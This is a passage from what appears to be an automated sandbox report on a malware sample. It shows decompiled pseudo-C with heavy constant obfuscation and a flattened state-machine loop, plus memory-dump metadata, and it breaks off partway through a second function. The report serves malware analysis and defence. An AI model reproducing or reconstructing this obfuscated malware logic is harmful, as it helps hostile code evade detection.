                                                                                                                                                            				_v176 = _v176 ^ 0x7af5486d;
                                                                                                                                                            				_v176 = _v176 ^ 0x7aeb8f45;
                                                                                                                                                            				_v244 = 0x4d92e1;
                                                                                                                                                            				_t782 = 0x5f;
                                                                                                                                                            				_v88 = 0x20;
                                                                                                                                                            				_v244 = _v244 * 0x4a;
                                                                                                                                                            				_v244 = _v244 | 0x7c3f7c28;
                                                                                                                                                            				_v244 = _v244 ^ 0x7e7c1ac2;
                                                                                                                                                            				_v284 = 0xc8aa60;
                                                                                                                                                            				_v284 = _v284 + 0x32b9;
                                                                                                                                                            				_v284 = _v284 + 0xffff127a;
                                                                                                                                                            				_v284 = _v284 ^ 0x00c1b775;
                                                                                                                                                            				_v228 = 0x32f957;
                                                                                                                                                            				_v228 = _v228 << 0xa;
                                                                                                                                                            				_v228 = _v228 ^ 0xe304a089;
                                                                                                                                                            				_v228 = _v228 ^ 0x28edcf32;
                                                                                                                                                            				_v364 = 0x1a55e7;
                                                                                                                                                            				_v364 = _v364 * 0x68;
                                                                                                                                                            				_v364 = _v364 * 0x36;
                                                                                                                                                            				_v364 = _v364 ^ 0xa842ca33;
                                                                                                                                                            				_v364 = _v364 ^ 0xe9f59c27;
                                                                                                                                                            				_v168 = 0x34b570;
                                                                                                                                                            				_v168 = _v168 | 0x6b6928c5;
                                                                                                                                                            				_v168 = _v168 ^ 0x6b739674;
                                                                                                                                                            				_v104 = 0x8a8082;
                                                                                                                                                            				_v104 = _v104 * 0x3f;
                                                                                                                                                            				_v104 = _v104 ^ 0x2214377a;
                                                                                                                                                            				_v212 = 0x18307b;
                                                                                                                                                            				_v212 = _v212 ^ 0x4b6e1055;
                                                                                                                                                            				_v212 = _v212 ^ 0x41119872;
                                                                                                                                                            				_v212 = _v212 ^ 0x0a6c434c;
                                                                                                                                                            				_v132 = 0x8b3f3c;
                                                                                                                                                            				_v132 = _v132 << 2;
                                                                                                                                                            				_v132 = _v132 ^ 0x022c35f2;
                                                                                                                                                            				_v328 = 0x314aa5;
                                                                                                                                                            				_v328 = _v328 | 0xbabb419f;
                                                                                                                                                            				_v328 = _v328 / _t782;
                                                                                                                                                            				_v328 = _v328 + 0xe73f;
                                                                                                                                                            				_v328 = _v328 ^ 0x01f1132e;
                                                                                                                                                            				_v140 = 0x403514;
                                                                                                                                                            				_v140 = _v140 + 0xffff4e06;
                                                                                                                                                            				_v140 = _v140 ^ 0x0039264a;
                                                                                                                                                            				while(1) {
                                                                                                                                                            					L1:
                                                                                                                                                            					_t783 = 0xf0ee26a;
                                                                                                                                                            					_t842 = 0xbf4f028;
                                                                                                                                                            					_t716 = 0xc1f5c56;
                                                                                                                                                            					do {
                                                                                                                                                            						while(1) {
                                                                                                                                                            							L2:
                                                                                                                                                            							_t878 = _t766 - _t716;
                                                                                                                                                            							if(_t878 > 0) {
                                                                                                                                                            								break;
                                                                                                                                                            							}
                                                                                                                                                            							if(_t878 == 0) {
                                                                                                                                                            								_push(_v160);
                                                                                                                                                            								_push(_v112);
                                                                                                                                                            								_t732 = E0038DCF7(_v396, 0x371884, __eflags);
                                                                                                                                                            								_push(_v392);
                                                                                                                                                            								_t866 = _t732;
                                                                                                                                                            								_push(_v384);
                                                                                                                                                            								_t733 = E0038DCF7(_v152, 0x371924, __eflags);
                                                                                                                                                            								_v76 = _v124;
                                                                                                                                                            								_t735 = E0037CB52(_v376, _t866, _v268, _v116, _v144);
                                                                                                                                                            								_v68 = _v68 & 0x00000000;
                                                                                                                                                            								_v72 = _t866;
                                                                                                                                                            								_v80 = 2 + _t735 * 2;
                                                                                                                                                            								_v60 =  &_v80;
                                                                                                                                                            								_v92 = _v88;
                                                                                                                                                            								_v64 = 1;
                                                                                                                                                            								_t741 = E00378D13( &_v32, _v200, _v368,  &_v92, _v84, _t733, _v312,  &_v68, _v88, _v320, _v136, _v236);
                                                                                                                                                            								_t875 =  &(_t875[0x11]);
                                                                                                                                                            								__eflags = _t741 - _v304;
                                                                                                                                                            								_t766 =  ==  ? 0xbf4f028 : 0xf9e92c1;
                                                                                                                                                            								E0037A8B0(_v296, _t866, _v196);
                                                                                                                                                            								E0037A8B0(_v360, _t733, _v288);
                                                                                                                                                            								_t864 = 0xf9e92c1;
                                                                                                                                                            								goto L24;
                                                                                                                                                            							} else {
                                                                                                                                                            								if(_t766 == 0xdec32e) {
                                                                                                                                                            									_t746 =  *0x393dfc; // 0x0
									E00388519(_v104, _v212,  *((intOrPtr*)(_t746 + 0x50)));
									_t766 = _t864;
									while(1) {
										L1:
										_t783 = 0xf0ee26a;
										_t842 = 0xbf4f028;
										_t716 = 0xc1f5c56;
										goto L2;
									}
								} else {
									if(_t766 == 0x41de8e2) {
										_t766 = 0xe078043;
										continue;
									} else {
										if(_t766 == _t868) {
											_push(_v128);
											_push(_v184);
											_t871 = E0038DCF7(_v372, 0x371904, __eflags);
											_t585 =  &_v300; // 0x3e0de8e7
											_v44 =  *_t585;
											_v40 = _v252;
											_pop(_t807);
											_v36 = _v100;
											_t752 =  *0x393dfc; // 0x0
											_t754 =  *0x393dfc; // 0x0
											_t755 =  *0x393dfc; // 0x0
											_t757 = E0038D84C(_t807, _v120, _t755 + 0x64, _v276,  *((intOrPtr*)(_t754 + 0x54)), _v96, _v176, _v244, _v284, _v228, _v292, _t807, _t748,  &_v44,  *((intOrPtr*)(_t752 + 0x50)));
											_t875 =  &(_t875[0xd]);
											__eflags = _t757 - _v348;
											if(_t757 != _v348) {
												_t766 = 0xdec32e;
											} else {
												_t766 = _t864;
												_t873 = 1;
											}
											E0037A8B0(_v364, _t871, _v168);
											goto L24;
										} else {
											_t882 = _t766 - _t842;
											if(_t766 == _t842) {
												_push(_v192);
												_push(_v332);
												_t759 = E0038DCF7(_v108, 0x3718b4, _t882);
												_pop(_t812);
												_t760 =  *0x393dfc; // 0x0
												E00390B68(_t759,  &_v92, _v220, _v204, _t812, _t760 + 0x54, _v308, _v260, _v316, _v388, _v96, _v256);
												_t766 =  ==  ? 0xf0ee26a : _t864;
												E0037A8B0(_v340, _t759, _v380);
												L23:
												_t875 =  &(_t875[0xb]);
												L24:
												_t842 = 0xbf4f028;
												_t783 = 0xf0ee26a;
												_t868 = 0x80c65ec;
												_t716 = 0xc1f5c56;
											}
										}
										goto L25;
									}
								}
							}
							L20:
							return _t873;
						}
						__eflags = _t766 - 0xe078043;
						if(__eflags == 0) {
							_push(_v264);
							_push(_v352);
							_t717 = E0038DCF7(_v324, 0x3718e4, __eflags);
							_push(_v248);
							_push(_v180);
							_t718 = E0038DCF7(_v240, 0x371814, __eflags);
							_t665 =  &_v172; // 0x39264a
							__eflags = E00379462(_t717,  *_t665,  &_v96, _t718, _v336, _v344) - _v232;
							_t766 =  ==  ? 0xc1f5c56 : 0x1d0239b;
							E0037A8B0(_v216, _t717, _v224);
							E0037A8B0(_v148, _t718, _v156);
							_t864 = 0xf9e92c1;
							goto L23;
						} else {
							__eflags = _t766 - _t783;
							if(_t766 == _t783) {
								_t848 =  *0x393dfc; // 0x0
								_push(_t783);
								_push(_t783);
								_t792 = E00377FF2( *((intOrPtr*)(_t848 + 0x54)));
								_t730 =  *0x393dfc; // 0x0
								__eflags = _t792;
								_t766 =  !=  ? _t868 : _t864;
								 *((intOrPtr*)(_t730 + 0x50)) = _t792;
								goto L1;
							} else {
								__eflags = _t766 - _t864;
								if(__eflags != 0) {
									goto L25;
								} else {
									_t646 =  &_v140; // 0x39264a
									E0037957D(_v96, _v132, _v328, _v208,  *_t646);
								}
							}
						}
						goto L20;
						L25:
					} while (_t766 != 0x1d0239b);
					goto L20;
				}
			}
                                                                                                                                                            0x00372f53
                                                                                                                                                            0x00372f58
                                                                                                                                                            0x00372f60
                                                                                                                                                            0x00372f6b
                                                                                                                                                            0x00372f7e
                                                                                                                                                            0x00372f85
                                                                                                                                                            0x00372f90
                                                                                                                                                            0x00372fa3
                                                                                                                                                            0x00372fb2
                                                                                                                                                            0x00372fb9
                                                                                                                                                            0x00372fc4
                                                                                                                                                            0x00372fcf
                                                                                                                                                            0x00372fda
                                                                                                                                                            0x00372fe5
                                                                                                                                                            0x00372ff0
                                                                                                                                                            0x00372ffb
                                                                                                                                                            0x00373006
                                                                                                                                                            0x0037300e
                                                                                                                                                            0x00373016
                                                                                                                                                            0x0037301b
                                                                                                                                                            0x00373023
                                                                                                                                                            0x0037302b
                                                                                                                                                            0x00373036
                                                                                                                                                            0x00373041
                                                                                                                                                            0x0037304c
                                                                                                                                                            0x00373057
                                                                                                                                                            0x00373062
                                                                                                                                                            0x0037306d
                                                                                                                                                            0x00373078
                                                                                                                                                            0x00373083
                                                                                                                                                            0x0037308e
                                                                                                                                                            0x00373096
                                                                                                                                                            0x003730a3
                                                                                                                                                            0x003730a7
                                                                                                                                                            0x003730af
                                                                                                                                                            0x003730b7
                                                                                                                                                            0x003730bf
                                                                                                                                                            0x003730c7
                                                                                                                                                            0x003730cf
                                                                                                                                                            0x003730d7
                                                                                                                                                            0x003730df
                                                                                                                                                            0x003730e9
                                                                                                                                                            0x003730ee
                                                                                                                                                            0x003730f6
                                                                                                                                                            0x003730fb
                                                                                                                                                            0x00373103
                                                                                                                                                            0x0037310e
                                                                                                                                                            0x00373119
                                                                                                                                                            0x00373121
                                                                                                                                                            0x0037312c
                                                                                                                                                            0x00373141
                                                                                                                                                            0x00373144
                                                                                                                                                            0x0037314b
                                                                                                                                                            0x00373156
                                                                                                                                                            0x00373169
                                                                                                                                                            0x00373170
                                                                                                                                                            0x0037317b
                                                                                                                                                            0x00373191
                                                                                                                                                            0x00373198
                                                                                                                                                            0x003731a3
                                                                                                                                                            0x003731ab
                                                                                                                                                            0x003731b0
                                                                                                                                                            0x003731b4
                                                                                                                                                            0x003731bc
                                                                                                                                                            0x003731c4
                                                                                                                                                            0x003731cc
                                                                                                                                                            0x003731d4
                                                                                                                                                            0x003731dc
                                                                                                                                                            0x003731e4
                                                                                                                                                            0x003731f4
                                                                                                                                                            0x003731fc
                                                                                                                                                            0x00373201
                                                                                                                                                            0x00373207
                                                                                                                                                            0x0037320f
                                                                                                                                                            0x00373221
                                                                                                                                                            0x00373226
                                                                                                                                                            0x0037322f
                                                                                                                                                            0x0037323a
                                                                                                                                                            0x00373242
                                                                                                                                                            0x0037324a
                                                                                                                                                            0x00373252
                                                                                                                                                            0x0037325a
                                                                                                                                                            0x00373265
                                                                                                                                                            0x0037326d
                                                                                                                                                            0x00373278
                                                                                                                                                            0x00373284
                                                                                                                                                            0x00373289
                                                                                                                                                            0x00373293
                                                                                                                                                            0x00373298
                                                                                                                                                            0x003732a2
                                                                                                                                                            0x003732a5
                                                                                                                                                            0x003732a9
                                                                                                                                                            0x003732b1
                                                                                                                                                            0x003732c2
                                                                                                                                                            0x003732c5
                                                                                                                                                            0x003732cc
                                                                                                                                                            0x003732d7
                                                                                                                                                            0x003732e2
                                                                                                                                                            0x003732ed
                                                                                                                                                            0x003732f8
                                                                                                                                                            0x00373303
                                                                                                                                                            0x0037330b
                                                                                                                                                            0x00373313
                                                                                                                                                            0x0037331b
                                                                                                                                                            0x00373323
                                                                                                                                                            0x0037332b
                                                                                                                                                            0x00373336
                                                                                                                                                            0x00373341
                                                                                                                                                            0x0037334c
                                                                                                                                                            0x00373357
                                                                                                                                                            0x0037335e
                                                                                                                                                            0x00373369
                                                                                                                                                            0x00373371
                                                                                                                                                            0x00373379
                                                                                                                                                            0x00373381
                                                                                                                                                            0x00373389
                                                                                                                                                            0x00373394
                                                                                                                                                            0x003733a7
                                                                                                                                                            0x003733ae
                                                                                                                                                            0x003733b9
                                                                                                                                                            0x003733c1
                                                                                                                                                            0x003733c6
                                                                                                                                                            0x003733cb
                                                                                                                                                            0x003733d3
                                                                                                                                                            0x003733db
                                                                                                                                                            0x003733e0
                                                                                                                                                            0x003733e8
                                                                                                                                                            0x003733f0
                                                                                                                                                            0x003733f8
                                                                                                                                                            0x00373403
                                                                                                                                                            0x0037340e
                                                                                                                                                            0x00373416
                                                                                                                                                            0x00373421
                                                                                                                                                            0x0037342d
                                                                                                                                                            0x00373430
                                                                                                                                                            0x00373434
                                                                                                                                                            0x0037343c
                                                                                                                                                            0x00373444
                                                                                                                                                            0x0037344c
                                                                                                                                                            0x00373454
                                                                                                                                                            0x00373459
                                                                                                                                                            0x00373461
                                                                                                                                                            0x00373466
                                                                                                                                                            0x0037346e
                                                                                                                                                            0x00373479
                                                                                                                                                            0x00373484
                                                                                                                                                            0x0037348f
                                                                                                                                                            0x0037349a
                                                                                                                                                            0x003734a5
                                                                                                                                                            0x003734ad
                                                                                                                                                            0x003734b8
                                                                                                                                                            0x003734c3
                                                                                                                                                            0x003734ce
                                                                                                                                                            0x003734d9
                                                                                                                                                            0x003734e4
                                                                                                                                                            0x003734ec
                                                                                                                                                            0x003734f1
                                                                                                                                                            0x003734f6
                                                                                                                                                            0x003734fe
                                                                                                                                                            0x00373506
                                                                                                                                                            0x00373511
                                                                                                                                                            0x0037351c
                                                                                                                                                            0x00373527
                                                                                                                                                            0x00373532
                                                                                                                                                            0x0037353d
                                                                                                                                                            0x0037354a
                                                                                                                                                            0x00373555
                                                                                                                                                            0x0037355a

                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000009.00000002.492028130.0000000000371000.00000020.00000800.00020000.00000000.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                            • Associated: 00000009.00000002.492020139.0000000000370000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                                                            • Associated: 00000009.00000002.492071088.0000000000393000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                                                            Uniqueness

                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                            C-Code - Quality: 94%
                                                                                                                                                            			E0038AE6D(void* __ecx, intOrPtr __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a16, intOrPtr _a20) {
                                                                                                                                                            				intOrPtr _v4;
                                                                                                                                                            				intOrPtr _v8;
                                                                                                                                                            				char _v12;
                                                                                                                                                            				char _v16;
                                                                                                                                                            				intOrPtr _v20;
                                                                                                                                                            				intOrPtr _v24;
                                                                                                                                                            				char _v28;
                                                                                                                                                            				char _v32;
                                                                                                                                                            				signed int _v36;
                                                                                                                                                            				signed int _v40;
                                                                                                                                                            				signed int _v44;
                                                                                                                                                            				signed int _v48;
                                                                                                                                                            				signed int _v52;
                                                                                                                                                            				signed int _v56;
                                                                                                                                                            				signed int _v60;
                                                                                                                                                            				unsigned int _v64;
                                                                                                                                                            				signed int _v68;
                                                                                                                                                            				signed int _v72;
                                                                                                                                                            				signed int _v76;
                                                                                                                                                            				signed int _v80;
                                                                                                                                                            				signed int _v84;
                                                                                                                                                            				signed int _v88;
                                                                                                                                                            				signed int _v92;
                                                                                                                                                            				signed int _v96;
                                                                                                                                                            				signed int _v100;
                                                                                                                                                            				signed int _v104;
                                                                                                                                                            				signed int _v108;
                                                                                                                                                            				signed int _v112;
                                                                                                                                                            				signed int _v116;
                                                                                                                                                            				signed int _v120;
                                                                                                                                                            				signed int _v124;
                                                                                                                                                            				signed int _v128;
                                                                                                                                                            				signed int _v132;
                                                                                                                                                            				signed int _v136;
                                                                                                                                                            				signed int _v140;
                                                                                                                                                            				signed int _v144;
                                                                                                                                                            				signed int _v148;
                                                                                                                                                            				signed int _v152;
                                                                                                                                                            				signed int _v156;
                                                                                                                                                            				signed int _v160;
                                                                                                                                                            				signed int _v164;
                                                                                                                                                            				signed int _v168;
                                                                                                                                                            				signed int _v172;
                                                                                                                                                            				signed int _v176;
                                                                                                                                                            				signed int _v180;
                                                                                                                                                            				signed int _v184;
                                                                                                                                                            				signed int _v188;
                                                                                                                                                            				signed int _v192;
                                                                                                                                                            				signed int _v196;
                                                                                                                                                            				signed int _v200;
                                                                                                                                                            				signed int _v204;
                                                                                                                                                            				signed int _v208;
                                                                                                                                                            				signed int _v212;
                                                                                                                                                            				signed int _v216;
                                                                                                                                                            				signed int _v220;
                                                                                                                                                            				signed int _v224;
                                                                                                                                                            				signed int _v228;
                                                                                                                                                            				signed int _v232;
                                                                                                                                                            				signed int _v236;
                                                                                                                                                            				signed int _v240;
                                                                                                                                                            				signed int _v244;
                                                                                                                                                            				signed int _v248;
                                                                                                                                                            				signed int _v252;
                                                                                                                                                            				signed int _v256;
                                                                                                                                                            				signed int _v260;
                                                                                                                                                            				signed int _v264;
                                                                                                                                                            				signed int _v268;
                                                                                                                                                            				signed int _v272;
                                                                                                                                                            				void* _t537;
                                                                                                                                                            				void* _t566;
                                                                                                                                                            				void* _t567;
                                                                                                                                                            				intOrPtr _t573;
                                                                                                                                                            				void* _t575;
                                                                                                                                                            				void* _t577;
                                                                                                                                                            				void* _t585;
                                                                                                                                                            				void* _t588;
                                                                                                                                                            				void* _t594;
                                                                                                                                                            				void* _t596;
                                                                                                                                                            				signed int _t603;
                                                                                                                                                            				signed int _t604;
                                                                                                                                                            				signed int _t605;
                                                                                                                                                            				signed int _t606;
                                                                                                                                                            				signed int _t607;
                                                                                                                                                            				signed int _t608;
                                                                                                                                                            				signed int _t609;
                                                                                                                                                            				signed int _t610;
                                                                                                                                                            				void* _t611;
                                                                                                                                                            				void* _t633;
                                                                                                                                                            				void* _t660;
                                                                                                                                                            				void* _t675;
                                                                                                                                                            				intOrPtr _t677;
                                                                                                                                                            				intOrPtr _t680;
                                                                                                                                                            				signed int* _t682;
                                                                                                                                                            				void* _t685;
                                                                                                                                                            
                                                                                                                                                            				_push(_a20);
                                                                                                                                                            				_t677 = __edx;
                                                                                                                                                            				_push(_a16);
                                                                                                                                                            				_v24 = __edx;
                                                                                                                                                            				_push(0x20);
                                                                                                                                                            				_push(_a8);
                                                                                                                                                            				_push(_a4);
                                                                                                                                                            				_push(__edx);
                                                                                                                                                            				_push(__ecx);
                                                                                                                                                            				E003820B9(_t537);
                                                                                                                                                            				_v8 = 0x673696;
                                                                                                                                                            				_t680 = 0;
                                                                                                                                                            				_v4 = 0;
                                                                                                                                                            				_t682 =  &(( &_v272)[7]);
                                                                                                                                                            				_v144 = 0xf00d33;
                                                                                                                                                            				_v144 = _v144 | 0x228e8b2e;
                                                                                                                                                            				_t596 = 0x1d3710;
                                                                                                                                                            				_v144 = _v144 >> 8;
                                                                                                                                                            				_v144 = _v144 ^ 0x0022fe8f;
                                                                                                                                                            				_v244 = 0xde08aa;
                                                                                                                                                            				_t603 = 0x17;
                                                                                                                                                            				_v244 = _v244 / _t603;
                                                                                                                                                            				_v244 = _v244 + 0xffff54ea;
                                                                                                                                                            				_v244 = _v244 << 0xa;
                                                                                                                                                            				_v244 = _v244 ^ 0x23f0fc00;
                                                                                                                                                            				_v224 = 0x36cb35;
                                                                                                                                                            				_v224 = _v224 | 0xc39aec51;
                                                                                                                                                            				_v224 = _v224 + 0x9146;
                                                                                                                                                            				_t604 = 0x62;
                                                                                                                                                            				_v224 = _v224 * 0x70;
                                                                                                                                                            				_v224 = _v224 ^ 0xa3c851d0;
                                                                                                                                                            				_v116 = 0xf2e64b;
                                                                                                                                                            				_v116 = _v116 << 5;
                                                                                                                                                            				_v116 = _v116 ^ 0x1e5cc960;
                                                                                                                                                            				_v248 = 0x2b7d5f;
                                                                                                                                                            				_t43 =  &_v248; // 0x2b7d5f
                                                                                                                                                            				_v248 =  *_t43 * 0x53;
                                                                                                                                                            				_v248 = _v248 + 0x8561;
                                                                                                                                                            				_v248 = _v248 | 0xae4dc352;
                                                                                                                                                            				_v248 = _v248 ^ 0xae5feb7e;
                                                                                                                                                            				_v80 = 0xe6036b;
                                                                                                                                                            				_v80 = _v80 * 0xb;
                                                                                                                                                            				_v80 = _v80 ^ 0x09e22599;
                                                                                                                                                            				_v240 = 0x5b8b4f;
                                                                                                                                                            				_v240 = _v240 + 0xffffe1e0;
                                                                                                                                                            				_v240 = _v240 ^ 0xb7b7812a;
                                                                                                                                                            				_v240 = _v240 + 0xffff41e0;
                                                                                                                                                            				_v240 = _v240 ^ 0xb7ec2de5;
                                                                                                                                                            				_v232 = 0xf81ab6;
                                                                                                                                                            				_v232 = _v232 ^ 0xa56b9217;
                                                                                                                                                            				_v232 = _v232 | 0x431a55e8;
                                                                                                                                                            				_v232 = _v232 << 7;
                                                                                                                                                            				_v232 = _v232 ^ 0xcdeef480;
                                                                                                                                                            				_v184 = 0xddfe73;
                                                                                                                                                            				_v184 = _v184 * 0x26;
                                                                                                                                                            				_v184 = _v184 << 8;
                                                                                                                                                            				_v184 = _v184 ^ 0xf3c51200;
                                                                                                                                                            				_v120 = 0x644fb5;
                                                                                                                                                            				_v120 = _v120 >> 6;
                                                                                                                                                            				_v120 = _v120 / _t604;
                                                                                                                                                            				_v120 = _v120 ^ 0x00000418;
                                                                                                                                                            				_v60 = 0xc6ff9f;
                                                                                                                                                            				_v60 = _v60 ^ 0x0d96ce7d;
                                                                                                                                                            				_v60 = _v60 ^ 0x0d5031e2;
                                                                                                                                                            				_v204 = 0xeedb74;
                                                                                                                                                            				_v204 = _v204 >> 0xb;
                                                                                                                                                            				_v204 = _v204 >> 0xa;
                                                                                                                                                            				_v204 = _v204 | 0xba569879;
                                                                                                                                                            				_v204 = _v204 ^ 0xba56987f;
                                                                                                                                                            				_v268 = 0x9a0618;
                                                                                                                                                            				_v268 = _v268 ^ 0x10270239;
                                                                                                                                                            				_v268 = _v268 ^ 0x733075d3;
                                                                                                                                                            				_t605 = 0x16;
                                                                                                                                                            				_v268 = _v268 / _t605;
                                                                                                                                                            				_v268 = _v268 ^ 0x04865c22;
                                                                                                                                                            				_v160 = 0x655fad;
                                                                                                                                                            				_v160 = _v160 >> 3;
                                                                                                                                                            				_v160 = _v160 >> 4;
                                                                                                                                                            				_v160 = _v160 ^ 0x0009a8dc;
                                                                                                                                                            				_v272 = 0x9202;
                                                                                                                                                            				_v272 = _v272 | 0xfb135803;
                                                                                                                                                            				_t606 = 0x41;
                                                                                                                                                            				_v272 = _v272 * 0x2c;
                                                                                                                                                            				_v272 = _v272 << 1;
                                                                                                                                                            				_v272 = _v272 ^ 0x4ed07035;
                                                                                                                                                            				_v100 = 0x536289;
                                                                                                                                                            				_v100 = _v100 << 9;
                                                                                                                                                            				_v100 = _v100 ^ 0xa6cd28cf;
                                                                                                                                                            				_v108 = 0xf021d8;
                                                                                                                                                            				_v108 = _v108 ^ 0x8f8b6ed2;
                                                                                                                                                            				_v108 = _v108 ^ 0x8f701d8c;
                                                                                                                                                            				_v152 = 0xcba027;
                                                                                                                                                            				_v152 = _v152 ^ 0xce0cd109;
                                                                                                                                                            				_v152 = _v152 | 0x7dfb06f6;
                                                                                                                                                            				_v152 = _v152 ^ 0xfff88f5e;
                                                                                                                                                            				_v252 = 0xf09c41;
                                                                                                                                                            				_v252 = _v252 + 0x8e2a;
                                                                                                                                                            				_v252 = _v252 << 3;
                                                                                                                                                            				_v252 = _v252 | 0xdb831f2c;
                                                                                                                                                            				_v252 = _v252 ^ 0xdf846234;
                                                                                                                                                            				_v260 = 0x3d692f;
                                                                                                                                                            				_v260 = _v260 << 2;
                                                                                                                                                            				_v260 = _v260 | 0xbfb4a027;
                                                                                                                                                            				_v260 = _v260 + 0x643;
                                                                                                                                                            				_v260 = _v260 ^ 0xbffb0fde;
                                                                                                                                                            				_v92 = 0x80bca7;
                                                                                                                                                            				_v92 = _v92 >> 0xa;
                                                                                                                                                            				_v92 = _v92 ^ 0x00038c1c;
                                                                                                                                                            				_v228 = 0xbbbc43;
                                                                                                                                                            				_v228 = _v228 | 0x61282476;
                                                                                                                                                            				_v228 = _v228 + 0xffff6ee2;
                                                                                                                                                            				_v228 = _v228 * 0x69;
                                                                                                                                                            				_v228 = _v228 ^ 0x15ccd750;
                                                                                                                                                            				_v236 = 0xc2062f;
                                                                                                                                                            				_v236 = _v236 | 0xf7f3ef67;
                                                                                                                                                            				_v236 = _v236 * 0x5c;
                                                                                                                                                            				_v236 = _v236 ^ 0x1ba01eed;
                                                                                                                                                            				_v128 = 0xa773bc;
                                                                                                                                                            				_v128 = _v128 << 0x10;
                                                                                                                                                            				_v128 = _v128 | 0xe162daa5;
                                                                                                                                                            				_v128 = _v128 ^ 0xf3f36b57;
                                                                                                                                                            				_v136 = 0x3287f3;
                                                                                                                                                            				_v136 = _v136 / _t606;
                                                                                                                                                            				_v136 = _v136 >> 9;
                                                                                                                                                            				_v136 = _v136 ^ 0x000c37d1;
                                                                                                                                                            				_v104 = 0x8d5fef;
                                                                                                                                                            				_v104 = _v104 + 0xffff56ea;
                                                                                                                                                            				_v104 = _v104 ^ 0x008f942b;
                                                                                                                                                            				_v44 = 0xd6bac6;
                                                                                                                                                            				_v44 = _v44 * 0x7f;
                                                                                                                                                            				_v44 = _v44 ^ 0x6a80c639;
                                                                                                                                                            				_v148 = 0xa4165e;
                                                                                                                                                            				_v148 = _v148 * 0x13;
                                                                                                                                                            				_v148 = _v148 | 0x84e82f79;
                                                                                                                                                            				_v148 = _v148 ^ 0x8cef9599;
                                                                                                                                                            				_v96 = 0xfc4916;
                                                                                                                                                            				_v96 = _v96 + 0xffff0795;
                                                                                                                                                            				_v96 = _v96 ^ 0x00f5cebb;
                                                                                                                                                            				_v132 = 0xd5d7c2;
                                                                                                                                                            				_v132 = _v132 >> 0x10;
                                                                                                                                                            				_v132 = _v132 << 0xd;
                                                                                                                                                            				_v132 = _v132 ^ 0x0010cc3c;
                                                                                                                                                            				_v264 = 0xf6e8cb;
                                                                                                                                                            				_v264 = _v264 + 0x6576;
                                                                                                                                                            				_v264 = _v264 + 0x7b15;
                                                                                                                                                            				_v264 = _v264 + 0x6b9c;
                                                                                                                                                            				_v264 = _v264 ^ 0x00fe3ec7;
                                                                                                                                                            				_v208 = 0x3a8541;
                                                                                                                                                            				_v208 = _v208 | 0x57459f57;
                                                                                                                                                            				_v208 = _v208 ^ 0x66631a8c;
                                                                                                                                                            				_v208 = _v208 | 0x178bfabb;
                                                                                                                                                            				_v208 = _v208 ^ 0x379a2cb6;
                                                                                                                                                            				_v56 = 0x33c5e6;
                                                                                                                                                            				_v56 = _v56 + 0x441;
                                                                                                                                                            				_v56 = _v56 ^ 0x0035e6a0;
                                                                                                                                                            				_v172 = 0x2bd4df;
                                                                                                                                                            				_v172 = _v172 + 0xda1f;
                                                                                                                                                            				_v172 = _v172 + 0x8171;
                                                                                                                                                            				_v172 = _v172 ^ 0x002cd084;
                                                                                                                                                            				_v48 = 0x796d26;
                                                                                                                                                            				_v48 = _v48 + 0xffff3152;
                                                                                                                                                            				_v48 = _v48 ^ 0x00766b67;
                                                                                                                                                            				_v88 = 0xfc738c;
                                                                                                                                                            				_v88 = _v88 << 0xe;
                                                                                                                                                            				_v88 = _v88 ^ 0x1ce8da45;
                                                                                                                                                            				_v140 = 0x79fdd0;
                                                                                                                                                            				_v140 = _v140 >> 0xe;
                                                                                                                                                            				_v140 = _v140 * 0x78;
                                                                                                                                                            				_v140 = _v140 ^ 0x000f2c53;
                                                                                                                                                            				_v64 = 0xd0b1f6;
                                                                                                                                                            				_v64 = _v64 >> 9;
                                                                                                                                                            				_v64 = _v64 ^ 0x000411a2;
                                                                                                                                                            				_v200 = 0xaa2240;
                                                                                                                                                            				_v200 = _v200 | 0x35f3f2d4;
                                                                                                                                                            				_v200 = _v200 + 0x4147;
                                                                                                                                                            				_v200 = _v200 + 0xffff1702;
                                                                                                                                                            				_v200 = _v200 ^ 0x35f16a60;
                                                                                                                                                            				_v52 = 0x980f89;
                                                                                                                                                            				_v52 = _v52 ^ 0xc15a5b47;
                                                                                                                                                            				_v52 = _v52 ^ 0xc1c323e9;
                                                                                                                                                            				_v216 = 0xb7a8b5;
                                                                                                                                                            				_v216 = _v216 >> 3;
                                                                                                                                                            				_v216 = _v216 ^ 0xa2f7ad91;
                                                                                                                                                            				_v216 = _v216 + 0xfffff0a8;
                                                                                                                                                            				_v216 = _v216 ^ 0xa2ec62b8;
                                                                                                                                                            				_v72 = 0x73581d;
                                                                                                                                                            				_v72 = _v72 + 0xffffc838;
                                                                                                                                                            				_v72 = _v72 ^ 0x00777119;
                                                                                                                                                            				_v164 = 0x873053;
                                                                                                                                                            				_v164 = _v164 ^ 0xefe323e3;
                                                                                                                                                            				_v164 = _v164 | 0xd91bba05;
                                                                                                                                                            				_v164 = _v164 ^ 0xff705bac;
                                                                                                                                                            				_v40 = 0xf8d5df;
                                                                                                                                                            				_v40 = _v40 ^ 0x79f853d7;
                                                                                                                                                            				_v40 = _v40 ^ 0x79053437;
                                                                                                                                                            				_v192 = 0x180af0;
                                                                                                                                                            				_v192 = _v192 + 0xffff4c14;
                                                                                                                                                            				_v192 = _v192 << 8;
                                                                                                                                                            				_v192 = _v192 + 0x2aad;
                                                                                                                                                            				_v192 = _v192 ^ 0x175759c3;
                                                                                                                                                            				_v256 = 0x23b549;
                                                                                                                                                            				_v256 = _v256 + 0x5eb6;
                                                                                                                                                            				_v256 = _v256 | 0xffb7bbff;
                                                                                                                                                            				_v256 = _v256 ^ 0xffb807e9;
                                                                                                                                                            				_v176 = 0xc1fdd5;
                                                                                                                                                            				_v176 = _v176 >> 0xc;
                                                                                                                                                            				_v176 = _v176 | 0x5151af8d;
                                                                                                                                                            				_v176 = _v176 ^ 0x515c7a4b;
                                                                                                                                                            				_v112 = 0xec5780;
                                                                                                                                                            				_v112 = _v112 ^ 0x97b4c021;
                                                                                                                                                            				_v112 = _v112 ^ 0x9750bd7e;
                                                                                                                                                            				_v180 = 0x591b41;
                                                                                                                                                            				_v180 = _v180 + 0x207e;
                                                                                                                                                            				_v180 = _v180 + 0xffffc81d;
                                                                                                                                                            				_v180 = _v180 ^ 0x005ca8dc;
                                                                                                                                                            				_v68 = 0x76fd1d;
                                                                                                                                                            				_t675 = 0x5c52c4a;
